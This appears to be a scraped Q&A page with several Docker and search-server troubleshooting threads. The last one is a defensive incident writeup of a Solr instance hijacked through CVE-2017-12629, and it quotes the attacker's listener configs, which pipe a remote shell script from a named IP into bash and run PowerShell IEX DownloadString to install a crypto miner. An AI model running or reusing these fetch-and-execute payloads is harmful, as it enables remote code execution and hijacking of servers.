How to perform an in-place update in Solr?

I am currently trying to perform an in-place update in Solr 8.11.1 (https://solr.apache.org/guide/8_11/updating-parts-of-documents.html#in-place-updates), but the update does not seem to succeed, even though the field to be updated fulfills all the listed criteria (as does the _version_ field) and there are no copy fields.
I reproduced the issue with a minimal schema in a local Solr Docker container and still can't make it work.
Started a new Solr container: docker run -d -p 8983:8983 --name my_solr -t solr:8.11.1-slim (using this version because it is the one used in our project).
Created a core: docker exec -it my_solr solr create_core -c gettingstarted
Created a non-indexed, non-stored, single-valued, numeric docValues field popularity (a Schema API sketch follows after the field listing below).
This leads to a minimal schema with the following fields (http://localhost:8983/solr/gettingstarted/schema/fields):
{
  "responseHeader": {
    "status": 0,
    "QTime": 0
  },
  "fields": [
    {
      "name": "_nest_path_",
      "type": "_nest_path_"
    },
    {
      "name": "_root_",
      "type": "string",
      "docValues": false,
      "indexed": true,
      "stored": false
    },
    {
      "name": "_text_",
      "type": "text_general",
      "multiValued": true,
      "indexed": true,
      "stored": false
    },
    {
      "name": "_version_",
      "type": "plong",
      "indexed": false,
      "stored": false
    },
    {
      "name": "id",
      "type": "string",
      "multiValued": false,
      "indexed": true,
      "required": true,
      "stored": true
    },
    {
      "name": "popularity",
      "type": "pint",
      "uninvertible": false,
      "docValues": true,
      "indexed": false,
      "stored": false
    }
  ]
}
I created a document with ID "1":
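For completeness, a minimal sketch of that step (assuming the JSON update handler and commit-on-send):
curl -X POST -H 'Content-type:application/json' 'http://localhost:8983/solr/gettingstarted/update?commit=true' --data-binary '[{"id":"1"}]'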
I perform the in-place update and enforce it as suggested in the documentation:
curl -X POST -H 'Content-type:application/json' 'http://localhost:8983/solr/gettingstarted/update?commit=true&update.partial.requireInPlace=true' --data-binary '[{"id":"1", "popularity":{"set":99}}]'
with a successful response, so I would expect the in-place update to have succeeded:
{"responseHeader":{"status":0,"QTime":1}}
However, the update was not applied, as I can't retrieve the popularity value via the field list (https://solr.apache.org/guide/6_6/docvalues.html#DocValues-RetrievingDocValuesDuringSearch):
{
  "responseHeader": {
    "status": 0,
    "QTime": 2,
    "params": {
      "q": "*:*",
      "indent": "true",
      "fl": "id,popularity",
      "q.op": "OR",
      "_": "1662731041895"
    }
  },
  "response": {
    "numFound": 1,
    "start": 0,
    "numFoundExact": true,
    "docs": [
      {
        "id": "1"
      }
    ]
  }
}
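The value can also be checked through the implicit real-time get handler; a sketch, assuming the default /get handler path:
curl 'http://localhost:8983/solr/gettingstarted/get?id=1&fl=id,popularity'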
Can anyone explain this behavior? I would expect this in-place update to work as is.
Best regards,
Jonas

Related

Nagios Core InfluxDB not showing Nagios data

I have followed this guide:
https://support.nagios.com/kb/article/nagios-core-performance-graphs-using-influxdb-nagflux-grafana-histou-802.html#Nagflux_Config
I already have PNP4Nagios running on the server (Debian 9), but I can't get any further; I've been trying to fix this for weeks.
I am stuck at this point:
Verify Nagflux Is Working
Execute the following query to verify that InfluxDB is being populated with Nagios performance data:
curl -G "http://localhost:8086/query?db=nagflux&pretty=true" --data-urlencode "q=show series"
When I execute that command I get this:
{
  "results": [
    {}
  ]
}
I already did this on another distro (CentOS 8); still no results.
But when I execute this command (earlier in the documentation)
curl -G "http://localhost:8086/query?pretty=true" --data-urlencode "q=show databases"
This works:
{
  "results": [
    {
      "series": [
        {
          "name": "databases",
          "columns": [
            "name"
          ],
          "values": [
            [
              "_internal"
            ],
            [
              "nagflux"
            ]
          ]
        }
      ]
    }
  ]
}
I can add the InfluxDB datasource successfully in Grafana, but I cannot select any data when I try to select it from the "FROM" field.
It's only showing:
Default
Autogen
So I am very curious what I am doing wrong; normally the documentation from Nagios support works very well.
Thank you big time for reading my issue :).
As you already have PNP4Nagios installed, https://support.nagios.com/kb/article/nagios-core-using-grafana-with-pnp4nagios-803.html would be a more appropriate solution for you.
/usr/local/nagios/etc/nagios.cfg needs a different host_perfdata_file_processing_command when you want to fill InfluxDB (with Nagflux) instead of using Grafana with PNP4Nagios.
You don't need another server. I have Nagios Core, InfluxDB, Nagflux, Histou and Grafana working on same machine.
And you don't have to uninstall PNP4Nagios, just stop the service & disable it on boot: systemctl stop npcd.service && systemctl disable npcd.service.
After that you have to edit nagios.cfg according to https://support.nagios.com/kb/article/nagios-core-performance-graphs-using-influxdb-nagflux-grafana-histou-802.html#Nagios_Command_Config to change the host_perfdata_file_processing_command value, and change the format of *_perfdata_file_template.
Then define the process-host-perfdata-file-nagflux & process-service-perfdata-file-nagflux commands in commands.cfg.
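For illustration, those definitions might look roughly like this (the command_line paths are illustrative; take the exact values from the linked KB article):
define command {
    command_name    process-host-perfdata-file-nagflux
    command_line    /bin/mv /usr/local/nagios/var/host-perfdata /usr/local/nagios/var/spool/nagfluxperfdata/$TIMET$.perfdata.host
}
define command {
    command_name    process-service-perfdata-file-nagflux
    command_line    /bin/mv /usr/local/nagios/var/service-perfdata /usr/local/nagios/var/spool/nagfluxperfdata/$TIMET$.perfdata.service
}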
If you did as described above, after a minute you should see changes in your nagflux database.
Install influxdb-client, then:
influx
use nagflux
SELECT * FROM METRICS
You should see your database loading :)

containerd error "failed to find user by uid" when creating ejbca docker container on azure

When I try to create an Azure container instance for EJBCA-ce, I get an error and cannot see any logs.
I expect the container to start normally, but instead I get the following error:
Failed to start container my-azure-container-resource-name, Error response: to create containerd task: failed to create container e9e48a_________ffba97: guest RPC failure: failed to find user by uid: 10001: expected exactly 1 user matched '0': unknown
Some context:
I run the container on an Azure cloud container instance.
I tried:
- from an ARM template
- from the Azure Portal
- with a file share mounted
- with database env variables
- without any env variables
It runs fine locally using the same env variables (database configuration).
It used to run with the same configuration a couple of weeks ago.
Here are some logs I get when I attach the container group from az cli.
(count: 1) (last timestamp: 2020-11-03 16:04:32+00:00) pulling image "primekey/ejbca-ce:6.15.2.3"
(count: 1) (last timestamp: 2020-11-03 16:04:37+00:00) Successfully pulled image "primekey/ejbca-ce:6.15.2.3"
(count: 28) (last timestamp: 2020-11-03 16:27:52+00:00) Error: Failed to start container aci-pulsy-ccm-ejbca-snd, Error response: to create containerd task: failed to create container e9e48a06807fba124dc29633dab10f6229fdc5583a95eb2b79467fe7cdffba97: guest RPC failure: failed to find user by uid: 10001: expected exactly 1 user matched '0': unknown
Here is an extract of the Dockerfile from Docker Hub. I suspect the issue might be related to the USER 0 and USER 10001 commands that appear several times in it:
COPY dir:89ead00b20d79e0110fefa4ac30a827722309baa7d7d74bf99910b35c665d200 in /
/bin/sh -c rpm --import /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
CMD ["/bin/bash"]
USER 0
COPY dir:893e424bc63d1872ee580dfed4125a0bef1fa452b8ae89aa267d83063ce36025 in /opt/primekey
COPY dir:756f0fe274b13cf418a2e3222e3f6c2e676b174f747ac059a95711db0097f283 in /licenses
USER 10001
CMD ["/opt/primekey/wildfly-14.0.1.Final/bin/standalone.sh" "-b" "0.0.0.0"
MAINTAINER PrimeKey Solutions AB
ARG releaseTag
ARG releaseEdition
ARM template
{
  "type": "Microsoft.ContainerInstance/containerGroups",
  "apiVersion": "2019-12-01",
  "name": "[variables('ejbcaContainerGroupName')]",
  "location": "[parameters('location')]",
  "tags": "[variables('tags')]",
  "dependsOn": [
    "[resourceId('Microsoft.DBforMariaDB/servers', variables('ejbcaMariadbServerName'))]",
    "[resourceId('Microsoft.DBforMariaDB/servers/databases', variables('ejbcaMariadbServerName'), variables('ejbcaMariadbDatabaseName'))]"
  ],
  "properties": {
    "sku": "Standard",
    "containers": [
      {
        "name": "[variables('ejbcaContainerName')]",
        "properties": {
          "image": "primekey/ejbca-ce:6.15.2.3",
          "ports": [
            {
              "protocol": "TCP",
              "port": 443
            },
            {
              "protocol": "TCP",
              "port": 8443
            }
          ],
          "environmentVariables": [
            {
              "name": "DATABASE_USER",
              "value": "[concat(parameters('mariadbUser'),'#', variables('ejbcaMariadbServerName'))]"
            },
            {
              "name": "DATABASE_JDBC_URL",
              "value": "[variables('ejbcaEnvVariableJdbcUrl')]"
            },
            {
              "name": "DATABASE_PASSWORD",
              "secureValue": "[parameters('mariadbAdminPassword')]"
            }
          ],
          "resources": {
            "requests": {
              "memoryInGB": 1.5,
              "cpu": 2
            }
          },
          "volumeMounts": [
            {
              "name": "certificates",
              "mountPath": "/mnt/external/secrets"
            }
          ]
        }
      }
    ],
    "initContainers": [],
    "restartPolicy": "OnFailure",
    "ipAddress": {
      "ports": [
        {
          "protocol": "TCP",
          "port": 443
        },
        {
          "protocol": "TCP",
          "port": 8443
        }
      ],
      "type": "Public",
      "dnsNameLabel": "[parameters('ejbcaContainerGroupDNSLabel')]"
    },
    "osType": "Linux",
    "volumes": [
      {
        "name": "certificates",
        "azureFile": {
          "shareName": "[parameters('ejbcaCertsFileShareName')]",
          "storageAccountName": "[parameters('ejbcaStorageAccountName')]",
          "storageAccountKey": "[parameters('ejbcaStorageAccountKey')]"
        }
      }
    ]
  }
}
It runs fine on my local machine on Linux (Ubuntu 20.04):
docker run -it --rm -p 8080:8080 -p 8443:8443 -h localhost -e DATABASE_USER="mymaridbuser#my-db" -e DATABASE_JDBC_URL="jdbc:mariadb://my-azure-domain.mariadb.database.azure.com:3306/ejbca?useSSL=true" -e DATABASE_PASSWORD="my-pwd" primekey/ejbca-ce:6.15.2.3
In the EJBCA-ce container image, I think they are trying to provide a user different from root to run the EJBCA server. According to the Docker documentation:
The USER instruction sets the user name (or UID) and optionally the user group (or GID) to use when running the image and for any RUN, CMD and ENTRYPOINT instructions that follow it in the Dockerfile
In the Dockerfile they reference two users: root, corresponding to UID 0, and another one with UID 10001.
Typically, in Linux and UNIX systems, UIDs are organized in ranges: this largely depends on the concrete operating system and user management practice, but it is very likely that a regular user account in a Linux system will be assigned a high UID such as 1001 or 10001, as in this case. Please see, for instance, the UID entry in Wikipedia or this article.
AFAIK, the USER indicated does not need to exist in the image for the container to run correctly: in fact, if you run it locally, it will start without further problems.
The user with UID 10001 will actually be set up in your container by the script run by the CMD defined in the Dockerfile, /opt/primekey/bin/start.sh, via this code fragment:
if ! whoami &> /dev/null; then
  if [ -w /etc/passwd ]; then
    echo "${APPLICATION_NAME}:x:$(id -u):0:${APPLICATION_NAME} user:/opt:/sbin/nologin" >> /etc/passwd
  fi
fi
Please be aware that APPLICATION_NAME in this context takes the value ejbca and that the user running this script, as indicated in the Dockerfile, is 10001. That will be the value returned by id -u in this code.
You can verify it if you run your container locally:
docker run -it -p 8080:8080 -p 8443:8443 -h localhost primekey/ejbca-ce:6.15.2.3
And initiate bash into it:
docker exec -it container_name /bin/bash
If you run whoami, it will tell you ejbca.
If you run id it will give you the following output:
uid=10001(ejbca) gid=0(root) groups=0(root)
You can verify the user existence in the /etc/passwd as well:
bash-4.2$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
ejbca:x:10001:0:ejbca user:/opt:/sbin/nologin
The reason why Pierre did not get this output is that he ran the container overriding the provided CMD and, as a consequence, did not execute the start.sh script responsible for creating the user, as mentioned above.
For some reason, and this is where my knowledge fails me, when Azure tries to run your container, it fails because the user with UID 10001 indicated in the Dockerfile does not exist.
I think it could be related to the use of containerd instead of docker.
The error reported by Azure seems related to the Microsoft project opengcs.
They say about the project:
Open Guest Compute Service is a Linux open source project to further the development of a production quality implementation of Linux Hyper-V container on Windows (LCOW). It's designed to run inside a custom Linux OS for supporting Linux container payload.
And:
The focus of LCOW v2 as a replacement of LCOW v1 is through the coordination and work that has gone into containerd/containerd and its Runtime V2 interface. To see our containerd hostside shim please look here Microsoft/hcsshim/cmd/containerd-shim-runhcs-v1.
The error you see in the console is raised by the spec.go file that you can find in their code base, when they are trying to establish the user on behalf of whom the container process should be run:
func setUserID(spec *oci.Spec, uid int) error {
    u, err := getUser(spec, func(u user.User) bool {
        return u.Uid == uid
    })
    if err != nil {
        return errors.Wrapf(err, "failed to find user by uid: %d", uid)
    }
    spec.Process.User.UID, spec.Process.User.GID = uint32(u.Uid), uint32(u.Gid)
    return nil
}
This code is executed by this other code fragment (you can see the full function code here):
parts := strings.Split(userstr, ":")
switch len(parts) {
case 1:
    v, err := strconv.Atoi(parts[0])
    if err != nil {
        // evaluate username to uid/gid
        return setUsername(spec, userstr)
    }
    return setUserID(spec, int(v))
And the getUser function:
func getUser(spec *oci.Spec, filter func(user.User) bool) (user.User, error) {
    users, err := user.ParsePasswdFileFilter(filepath.Join(spec.Root.Path, "/etc/passwd"), filter)
    if err != nil {
        return user.User{}, err
    }
    if len(users) != 1 {
        return user.User{}, errors.Errorf("expected exactly 1 user matched '%d'", len(users))
    }
    return users[0], nil
}
As you can see, these are exactly the errors that Azure is reporting to you.
In summary, I think they are providing a Windows LCOW solution that conforms to the OCI Image Format Specification, suitable for running containers with containerd.
As you indicated that it used to run with the same configuration a couple of weeks ago, my best guess is that they perhaps switched your containers from a pure Linux containerd runtime implementation to one based on Windows and the above-mentioned software, and this is why your containers are now failing.
A possible workaround could be to create a custom image based on the official one provided by PrimeKey and create the user 10001 yourself, as Pierre also pointed out.
To accomplish this task, first, create a new custom Dockerfile. You can try, for instance:
FROM primekey/ejbca-ce:6.15.2.3
USER 0
RUN echo "ejbca:x:10001:0:ejbca user:/opt:/sbin/nologin" >> /etc/passwd
USER 10001
Please, note that you may need to define some of the environment variables from the official EJBCA image.
With this Dockerfile you can build your image with docker or docker compose with an appropriate docker-compose.yaml file, something like:
version: "3"
services:
ejbca:
image: <your repository>/ejbca
build: .
ports:
- "8080:8080"
- "8443:8443"
Please, customize it as you consider appropriate.
With this setup the new container will still run properly in a local environment in the same way as the original one: I hope it will be also the case in Azure.
The user with UID 10001 does not exist in your image. This does not prevent the USER command in your Dockerfile from working or make the image itself invalid, but it seems to cause issues with Azure containers.
I cannot find docs or any reference on why it doesn't work on Azure (I will update this if I do), but adding the user to the image should solve the issue. Try adding something like this to your Dockerfile to create the user with UID 10001 (this must be done as root, i.e. with user 0):
RUN useradd -u 10001 myuser
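In full Dockerfile form, that might look like the sketch below (the user name myuser is illustrative):
FROM primekey/ejbca-ce:6.15.2.3
USER 0
RUN useradd -u 10001 myuser
USER 10001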
Additional notes showing that user 10001 does not exist:
# When running container, not recognized by system
$ docker run docker.io/primekey/ejbca-ce:6.15.2.3 whoami
whoami: cannot find name for user ID 10001
# Not present in /etc/passwd
$ docker run docker.io/primekey/ejbca-ce:6.15.2.3 cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin

Is there a way to set different indexes for different contracts in couchDB with hyperledger fabric

I'm using Hyperledger Fabric 1.4 with CouchDB 2.3.1 and two contracts, but I'm having trouble setting the indexes in the contracts and don't understand how to upload the indexes to CouchDB.
These are my indexes:
META-INF/statedb/couchdb/indexes/carIndex.json
{
  "index": {
    "fields": [
      "idCar",
      "date"
    ]
  },
  "ddoc": "indexIdCarDoc",
  "name": "indexIdCar",
  "type": "json"
}
META-INF/statedb/couchdb/indexes/bikeIndex.json
{
  "index": {
    "fields": [
      "idBike",
      "date"
    ]
  },
  "ddoc": "indexIdBikeDoc",
  "name": "indexIdBike",
  "type": "json"
}
How can I tell Hyperledger to apply the first index to the mychannel_carchaincode table and the second index to the mychannel_bikechaincode table?
Also, my chaincode is written in TypeScript. Should my META-INF/statedb/couchdb/indexes folder be in the dist folder? Is that why I can't see the indexes in my CouchDB after I upgrade? Or can indexes only be uploaded on instantiate?
Thanks
I had the same problem. My Hyperledger version is 1.4.7 and I'm using the IBM Blockchain extension for VS Code.
I solved it by putting this folder inside the lib folder of my project:
lib/META-INF/statedb/couchdb/indexes/index.json
After upgrading the smart contract, to make sure it works, go to the terminal and use this docker command:
docker logs 39f4adec6057 2>&1 | grep "CouchDB index"
where 39f4adec6057 is the peer container.
If it works, it shows something like:
[couchdb] CreateIndex -> INFO 0fc Created CouchDB index [tipoAtivo] in state database [mychannel_integra-chaincode] using design document [_design/tipoAtivoDoc]
If you are using TypeScript, the code will be compiled: make sure this folder gets copied to the dist folder. For this you can add a postbuild script to your package.json:
"postbuild": "cp -av ./META-INF dist/lib/META-INF",
When you issue the chaincode query, you have to use the use_index parameter to tell the chaincode which index to use for that query.
Link and example:
https://hyperledger-fabric.readthedocs.io/en/release-2.2/couchdb_tutorial.html#use-best-practices-for-queries-and-indexes
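For instance, a rich query against the car index from the question might look like this (a sketch; the selector value is illustrative):
{
  "selector": {
    "idCar": "CAR001"
  },
  "use_index": ["_design/indexIdCarDoc", "indexIdCar"]
}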

Create two containers with the same second volume names

I am learning Docker. When I run two MySQL containers with -v options whose volume names are the same, only one of those two volumes is created on the host file system. Does the second one override the first one, or does the system keep the first one? I don't see any command output showing a volume name conflict. Here are my commands:
docker container run -d --name mysql_1 -e MYSQL_ALLOW_EMPTY_PASSWORD=True -v mysql_db:/var/lib/mysql mysql
docker container run -d --name mysql_2 -e MYSQL_ALLOW_EMPTY_PASSWORD=True -v mysql_db:/var/lib/mysql mysql
I checked with the command docker volume inspect [name] and it seems the second volume overrides the first one:
[
  {
    "CreatedAt": "2020-07-24T09:34:05Z",
    "Driver": "local",
    "Labels": null,
    "Mountpoint": "/var/lib/docker/volumes/mysql_db78/_data",
    "Name": "mysql_db78",
    "Options": null,
    "Scope": "local"
  }
]
The CreatedAt is the time at which I typed the last docker container run -v ... command. But it is strange that Docker didn't notify me about a volume name conflict.
You're allowed to mount the same volume into different containers. Files read and written by one can be read and written by the other. There's no "conflict" here.
In both docker run commands you're telling Docker to mount a volume named mysql_db on to the path /var/lib/mysql. In the first command, Docker automatically creates the named volume, as though you had run docker volume create mysql_db, since it doesn't exist yet. Then the second docker run command reuses that same volume.
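A quick way to see the sharing behavior for yourself (a sketch using alpine instead of mysql so both containers start cleanly):
docker run -d --name c1 -v mysql_db:/data alpine sleep 300
docker run -d --name c2 -v mysql_db:/data alpine sleep 300
docker exec c1 sh -c 'echo hello > /data/f'
docker exec c2 cat /data/f   # prints "hello": both containers see the same volume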
(Operationally, you can't have multiple MySQL servers running off the same data store, so you should see a startup-time error referring to a lock file in the mysql_2 container. At a design level, try to avoid file sharing and prefer cross-container API calls instead, since coordinating file sharing can be tricky and it doesn't scale well to more advanced environments like Kubernetes.)

SolrException: Error loading class 'solr.RunExecutableListener' + '/var/tmp/sustes' process

Prehistory:
My friend's site started to work slowly.
The site uses Docker.
htop showed all cores loaded to 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, UID 8983 suggested the problem was in the Solr container.
I tried to update Solr from v6.? to 7.4 and got the message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub, https://hub.docker.com/_/solr/), as the site had to continue working.
In Docker's logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persisted to File System [{"update-listener":{
    "exe": "sh",
    "name": "newlistener-02",
    "args": [
      "-c",
      "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
    "event": "newSearcher",
    "class": "solr.RunExecutableListener",
    "dir": "/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (crypto miner config: http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we need just the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings of this file can be viewed at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove the file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
As I understand, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and was fixed in v5.5.5, 6.6.2+, and 7.1+.
The attack was possible because http://example.com:8983 was freely accessible to anyone, so even though this exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication": {
    "blockUnknown": true,
    "class": "solr.BasicAuthPlugin",
    "credentials": {
      "solr": "IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="
    }
  },
  "authorization": {
    "class": "solr.RuleBasedAuthorizationPlugin",
    "permissions": [
      {
        "name": "security-edit",
        "role": "admin"
      }
    ],
    "user-role": {
      "solr": "admin"
    }
  }
}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr has its own hash checker (a sha256(password+salt) hash), a typical solution cannot be used here. The easiest way I've found to generate a hash is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
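If you'd rather not download a jar, the scheme (as I understand it from Solr's Sha256AuthenticationProvider: base64(sha256(sha256(salt+password))) followed by the base64 salt) can be reproduced in the shell; a rough sketch, assuming openssl and GNU base64 are available:
PASS="NewPassword"
SALT=$(openssl rand 32 | base64 -w0)
HASH=$({ echo -n "$SALT" | base64 -d; echo -n "$PASS"; } | openssl dgst -sha256 -binary | openssl dgst -sha256 -binary | base64 -w0)
echo "$HASH $SALT"   # use this pair as the credentials value for the user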
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if the 'default' core is created. If not, create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to the web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
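Once the container is up, a quick way to confirm that authentication is enforced (a sketch; substitute your own user and password):
curl -u solr:NewPassword 'http://127.0.0.1:8983/solr/default/select?q=*:*'
The same request without valid credentials should be rejected, since blockUnknown is set to true.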
